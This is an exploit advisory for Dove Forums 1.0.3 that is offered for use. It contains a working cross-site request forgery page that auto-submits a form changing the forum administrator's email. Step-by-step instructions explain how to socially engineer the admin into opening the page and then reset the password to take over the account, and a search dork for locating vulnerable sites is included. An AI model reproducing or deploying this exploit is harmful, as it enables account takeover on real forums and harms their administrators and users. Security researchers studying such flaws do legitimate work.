In The Name Of Allah
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# Exploit Title:Dove Forums-Add admin CSRF           #                @@@@@             |
# Date :  2012-06-26                                 #               @      @           +
# Author :Ashiyane Digitl Security Team              #              @   @@@  @          |
# Vendor :http://www.doveforums.com/                 #              @  @  @  @          +
# Version: 1.0.3                                     #              @   @@  @              |          
# e-mail: Gigelaknak [at] Yahoo [dot] com            #           W   @    @     W       +
# Visit us: ashiyane.org/forums                       #             s          s         |
# Category: Webapps                                   #               s      s           +
# Google dork:"Powered By Dove Forums Version: 1.0.3"#                 s  s                |
# Demo site: http://allcrew.eu/forum/                #                  SS              +
# Tested on:                                         #                s    s            |
                                                     #             s          s         +
                                                     #          W                W      |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

1.Replace the forum path of your target with http://localhost/ at the second line of exploit code
2.Replace your e-mail with Gigelaknak@yahoo.com at the third line of exploit code
3.Save the exploit code as .html file and upload it some where ,Then give the link to admin using social engineering !
4.After admin opened the link ,click on the "Forgot Password" and get the Admin password on your E-mail ;)
5. Good Luck B-)

Tnx 2 N.A And all Iranian Hackers ...



Exploit Code :

<html>
<form name="csrf" action="http://localhost/index.php/admin/users/update/1" class="form" method="post" accept-charset="utf-8">
<input type="hidden" name="Username" value="admin" id="Username" class="textbox"  />
<input type="hidden" name="Email" value="Gigelaknak@yahoo.com" id="Email" class="textbox"  />
<select name="group">
<option value="1" selected="selected">admin</option>
</select>
<input type="checkbox" name="Active" value="1" checked="checked" id="Active" class="checkbox"  />
</from>
<script>document.csrf.submit();</script>
</html>